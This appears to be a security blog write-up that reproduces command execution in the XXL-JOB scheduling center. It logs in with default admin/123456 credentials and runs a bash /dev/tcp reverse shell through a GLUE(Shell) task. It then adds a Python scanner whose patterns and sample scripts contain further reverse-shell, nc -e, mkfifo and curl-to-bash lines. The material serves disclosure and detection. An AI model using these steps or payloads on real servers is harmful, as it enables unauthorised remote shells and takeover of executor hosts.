Repetition XXL - JOB scheduling center background arbitrary command execution
2022-07-30 04:32:00 【xiaochuhe.】
Warning
Do not use the content of this article for any unlawful purpose.
This article is provided without any warranty.
Table of Contents
I. Vulnerability description
II. Affected versions
III. Vulnerability reproduction
I. Vulnerability description
An attacker who can log in to the XXL-JOB scheduling center (xxl-job-admin) can create a GLUE(Shell) task whose script body is an arbitrary shell command line. The scheduling center pushes the script to an executor, which runs it, so the commands execute on the executor host with the privileges of the executor process. With the default admin/123456 credentials still in place, this is enough to obtain a remote shell on the server.
II. Affected versions
- xxl-job 1.9 series
III. Vulnerability reproduction
1. Log in to the admin console with the default credentials admin/123456 and add a new task with run mode GLUE(Shell).


2. Click GLUE IDE on the task to edit its script and enter the following (the shebang and the command are two separate lines; replace xxx.xxx.xxx.xxx with the listener's IP):
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'

3. On the attacker VPS, start a netcat listener on the port used in the script (e.g. nc -lvnp 6666):

4. Click Execute once on the task. When the executor runs the script it connects back to the listener and the listener receives a shell. Note that the shell comes from the executor host that ran the task and uses the executor process's account, which is not necessarily the admin-console host; delete the task after the test so it is not triggered again by the scheduler.
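As a defensive counterpart to the steps above, here is an added example (not code from the original post or from the xxl-job project) that scans exported GLUE(Shell) task scripts for the reverse-shell shape used in step 2 and a few related one-liners, looking only at lines bash would actually execute so that a commented-out payload is not reported. The job ids, script bodies and the 192.0.2.10 address are constructed for the example; exporting the scripts from the scheduling center into a {job_id: script} mapping is assumed to be done separately.

```python
"""Scan exported XXL-JOB GLUE(Shell) task scripts for reverse-shell indicators.

Added example for this write-up; it is not code from the original post or
from the xxl-job project. It assumes each task's GLUE source has already
been exported into a {job_id: script} mapping (for example from the
scheduling center's job table or by saving the GLUE IDE contents). The
scripts in SAMPLE_JOBS are constructed here; 192.0.2.10 is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicator name -> pattern, checked against each executable line.
# The first entry matches the shape of the payload used in the write-up
# (bash -i redirected over /dev/tcp/<host>/<port>); the rest cover other
# common one-liners worth flagging. The "sh -i" pattern requires a word
# boundary before "sh", so "ssh -i <key>" is deliberately not matched.
INDICATORS = [
    ("bash_dev_tcp",
     re.compile(r"/dev/(?:tcp|udp)/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})")),
    ("interactive_shell", re.compile(r"\b(?:ba|z|da)?sh\s+-i\b")),
    ("nc_exec", re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*\s-e\s+\S+")),
    ("mkfifo_pipe_shell", re.compile(r"\bmkfifo\b[^\n]*\b(?:nc|ncat)\b")),
    ("download_and_run", re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")),
]


@dataclass
class Finding:
    job_id: int
    indicator: str
    evidence: str                 # the offending line, whitespace-stripped
    host: Optional[str] = None    # only filled for bash_dev_tcp
    port: Optional[int] = None


def executable_lines(source: str):
    """Yield the lines bash would actually execute.

    Blank lines and full-line comments are skipped, so a commented-out
    payload is not reported. The shebang is a comment to bash as well, so a
    script whose shebang and command were accidentally joined on one line
    would not execute and is likewise not flagged.
    """
    for line in source.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            yield stripped


def scan_glue_source(job_id: int, source: str) -> List[Finding]:
    """Return one Finding per (line, indicator) hit, in INDICATORS order."""
    findings: List[Finding] = []
    for line in executable_lines(source):
        for name, pattern in INDICATORS:
            match = pattern.search(line)
            if match is None:
                continue
            finding = Finding(job_id=job_id, indicator=name, evidence=line)
            if name == "bash_dev_tcp":
                finding.host = match.group("host")
                finding.port = int(match.group("port"))
            findings.append(finding)
    return findings


def scan_jobs(jobs: Dict[int, str]) -> List[Finding]:
    findings: List[Finding] = []
    for job_id in sorted(jobs):
        findings.extend(scan_glue_source(job_id, jobs[job_id]))
    return findings


def flagged_jobs(jobs: Dict[int, str]) -> Dict[int, List[str]]:
    """Map each flagged job id to the indicator names it hit."""
    out: Dict[int, List[str]] = {}
    for f in scan_jobs(jobs):
        out.setdefault(f.job_id, []).append(f.indicator)
    return out


# Constructed sample tasks (not real exported data). Job 1 is the payload
# shape from the write-up; jobs 2 and 3 must produce no findings.
SAMPLE_JOBS = {
    1: "#!/bin/bash\nbash -c 'exec bash -i &>/dev/tcp/192.0.2.10/6666 <&1'\n",
    2: ("#!/bin/bash\n# nightly log rotation (benign)\n"
        "find /var/log/app -name '*.log' -mtime +7 -delete\n"
        "ssh -i /root/.ssh/backup_key backup@10.0.0.3 'ls /backups'\n"),
    3: ("#!/bin/bash\n# old debug hook, disabled:\n"
        "# bash -i >& /dev/tcp/192.0.2.10/9001 0>&1\necho noop\n"),
    4: "#!/bin/bash\nnc 192.0.2.10 4444 -e /bin/sh\n",
    5: "#!/bin/bash\ncurl -s http://192.0.2.10/x.sh | bash\n",
    6: ("#!/bin/bash\nrm -f /tmp/f; mkfifo /tmp/f; "
        "cat /tmp/f | /bin/sh -i 2>&1 | nc 192.0.2.10 1234 > /tmp/f\n"),
}

if __name__ == "__main__":
    for f in scan_jobs(SAMPLE_JOBS):
        where = f" -> {f.host}:{f.port}" if f.host else ""
        print(f"job {f.job_id}: {f.indicator}{where}: {f.evidence}")
```

Running the script on the constructed samples flags jobs 1, 4, 5 and 6 and leaves the benign and commented-out scripts alone; for the write-up's payload shape it also reports the callback host and port, which is what you would pivot on when checking listener traffic from the executor hosts.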

